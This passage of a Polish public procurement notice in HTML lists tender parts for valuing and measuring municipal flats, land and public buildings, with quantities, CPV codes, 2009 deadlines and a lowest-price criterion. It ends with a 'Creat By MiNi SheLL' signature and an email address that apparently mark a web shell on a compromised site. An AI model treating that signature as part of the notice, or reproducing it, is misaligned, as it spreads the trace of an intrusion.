I piętro pok. 45 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wycena nieruchomości oraz obmiar nieruchomości  
  			lokalowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	Wycena nieruchomości lokalowej mieszkalnej z obmiarem - maksymalna ilość 30 wycen;
2.	Wycena nieruchomości lokalowej mieszkalnej bez obmiaru - maksymalna ilość  180 wycen;
3.	Wycena nieruchomości lokalu użytkowego z obmiarem - maksymalna ilość 2 wyceny
4.	Wycena nieruchomości lokalu użytkowego bez obmiaru - maksymalna ilość 7 wyceny
5.	Obmiar lokalu mieszkalnego lub użytkowego z naniesieniem na rzut poziomy kondygnacji - maksymalna ilość 80 obmiarów;
6.	Obmiar lokalu mieszkalnego lub użytkowego z wykonaniem rzutów poziomych kondygnacji i zaznaczeniem lokali na rzutach poziomych kondygnacji - maksymalna ilość 15 obmiarów.

Przewidywane ilości jw. stanowią maksymalny zakres.. Zamawiający zastrzega sobie możliwość zmniejszenia ilości zlecanych poszczególnych rodzajów operatów z zachowaniem cen jednostkowych i z tego powodu Wykonawcy  nie przysługują żadne dodatkowe roszczenia w stosunku do Zamawiającego. 

	W ramach umowy Wykonawca winien wykonać pomiar wszystkich lokali (uwidocznionych w zleceniu) wraz z pomieszczeniami przynależnymi , ponadto wynik pomiaru winien być potwierdzony protokołem podpisanym przez Wykonawcę(przy pomiarze powinien być najemca lub osoba dorosła zamieszkująca z najemcą)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wycena nieruchomości gruntowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości gruntowej będącej w użytkowaniu wieczystym w celu uaktualnienia opłaty rocznej z tytułu tego użytkowania - maksymalna ilość 15 wycen;
2.	Wycena nieruchomości gruntowej w celu przekształcenia prawa użytkowania wieczystego w prawo własności - maksymalna ilość 75 wycen; punkt ten obejmuje wycenę prawa własności nieruchomości oraz prawa użytkowania wieczystego na niej ustanowionego poprzez pomnożenie wartości nieruchomości przez współczynnik korygujący. Sposób ustalania tego współczynnika reguluje Rozporządzenie Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz.U. Nr 207, poz. 2109 z późn. zm. )
3.	Wycena nieruchomości - sprzedaż prawa użytkowania wieczystego - maksymalna ilość 2 wyceny..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wycena nieruchomości zabudowanych dla potrzeb oddania w trwały zarząd.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości zabudowanej dla potrzeb oddania  w trwały zarząd - Ośrodek Sportowy GRANAT - działka nr ew. 62/4 o pow. 4,6183 ha, działka nr Ew. 62/8 o pow. 1,3883 ha - 1 wycena;
2.	Wycena nieruchomości zabudowanej dla potrzeb oddania w trwały zarząd - Hala sportowa przy ul. Sienkiewicza nr 34 - działka nr ew. 68/3 + boisko treningowe - 1 wycena..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wycena nieruchomości zabudowanych w celu naliczenia lub uaktualnienia opłaty za trwały zarząd..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	 Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejski Ośrodek Pomocy Społecznej ul. Staffa 21 - działki nr Ew. 17/2, 17/3, 19/1 o łącznej pow. 0,2404 ha - 1 wycena;
2.	Wycena nieruchomości zabudowanej w celu naliczenia opłaty za trwały zarząd - Miejski Ośrodek Pomocy Społecznej - ul. Sikorskiego 12 - działka nr Ew. 62/158 o pow. 1039 m2 - 1 wycena;
3.	Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejskie Centrum Sportu i Rekreacji - Pływalnia ul. Spółdzielcza 19 - działki nr Ew. 38/4, 38/5, 143/1, 37/4, 65/5 o łącznej pow. 6910 m2 -                             1 wycena;
4.	Wycena nieruchomości zabudowanej w celu uaktualnienia opłaty za trwały zarząd - Miejskie Centrum Sportu i Rekreacji - Planty ul. Zielna - działka                                   nr ew. 121 o pow. 5382 m2- 1 wycena..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.31.90.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com